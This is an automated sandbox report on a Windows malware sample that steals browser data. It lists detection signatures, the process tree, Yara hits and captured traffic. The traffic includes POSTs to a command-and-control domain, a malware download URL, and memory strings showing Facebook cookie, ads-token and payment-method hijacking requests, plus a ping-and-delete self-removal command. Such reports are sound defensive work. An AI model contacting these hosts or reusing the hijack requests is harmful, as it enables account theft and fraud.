Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report h1GodtbhC8.exe

Overview

General Information

Sample Name:h1GodtbhC8.exe
Analysis ID:327203
MD5:3ca6df4914385efd4ba9cd239b5ed254
SHA1:b66535ff43334177a5a167b9f2b07ade75484eec
SHA256:0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
Tags:exe

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Antivirus or Machine Learning detection for unpacked file
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • h1GodtbhC8.exe (PID: 5356 cmdline: 'C:\Users\user\Desktop\h1GodtbhC8.exe' MD5: 3CA6DF4914385EFD4BA9CD239B5ED254)
    • setup.exe (PID: 2172 cmdline: 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s MD5: 69C9BA53239D6838D05594D96A36DEA3)
      • aliens.exe (PID: 2992 cmdline: 'C:\Program Files (x86)\71eza90awf48\aliens.exe' MD5: 87698F069716708B6743A580B1D0D0CC)
        • msiexec.exe (PID: 1752 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
        • 1E1C360C582DF797.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)
          • 1607186572092.exe (PID: 2116 cmdline: 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
          • 1607186588295.exe (PID: 6636 cmdline: 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
          • ThunderFW.exe (PID: 7040 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
        • 1E1C360C582DF797.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3 MD5: 87698F069716708B6743A580B1D0D0CC)
          • cmd.exe (PID: 2416 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5728 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 4948 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 772 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
  • 0x1576d6:$xo1: /\x13\x12\x08[\x0B\x09\x14\x1C\x09\x1A\x16[\x18\x1A\x15\x15\x14\x0F[\x19\x1E[\x09\x0E\x15[\x12\x15[?4([\x16\x14\x1F\x1E
00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
21.2.1E1C360C582DF797.exe.46c0000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.46e0000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.10000000.6.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
25.2.1E1C360C582DF797.exe.4750000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.aliens.exe.46e0000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: h1GodtbhC8.exeAvira: detected
Antivirus detection for URL or domainShow sources
Source: http://www.sodown.xyz/index.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: dream.picsVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dllReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted fileShow sources
Source: h1GodtbhC8.exeVirustotal: Detection: 46%Perma Link
Source: h1GodtbhC8.exeMetadefender: Detection: 16%Perma Link
Source: h1GodtbhC8.exeReversingLabs: Detection: 64%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: h1GodtbhC8.exeJoe Sandbox ML: detected
Source: 25.2.1E1C360C582DF797.exe.4330000.4.unpackAvira: Label: TR/Patched.Ren.Gen2
Source: 21.2.1E1C360C582DF797.exe.42a0000.6.unpackAvira: Label: TR/Patched.Ren.Gen2
Source: 4.2.aliens.exe.42c0000.4.unpackAvira: Label: TR/Patched.Ren.Gen2
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123A928 FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00402D09 FindFirstFileA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_004066CC FindFirstFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA5A90 FindFirstFileA,FindClose,

Networking:

barindex
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: iplogger.org
Source: unknownDNS query: name: iplogger.org
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info/ddd HTTP/1.1Host: EF6DF4AF06BA6896.xyzAccept: */*
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1405Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: GET /info/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: POST /info/du HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 125Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: GET /info/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: ef6df4af06ba6896.xyz
Source: global trafficHTTP traffic detected: GET /info/ddd HTTP/1.1Host: EF6DF4AF06BA6896.xyzAccept: */*
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exeString found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com_7 equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
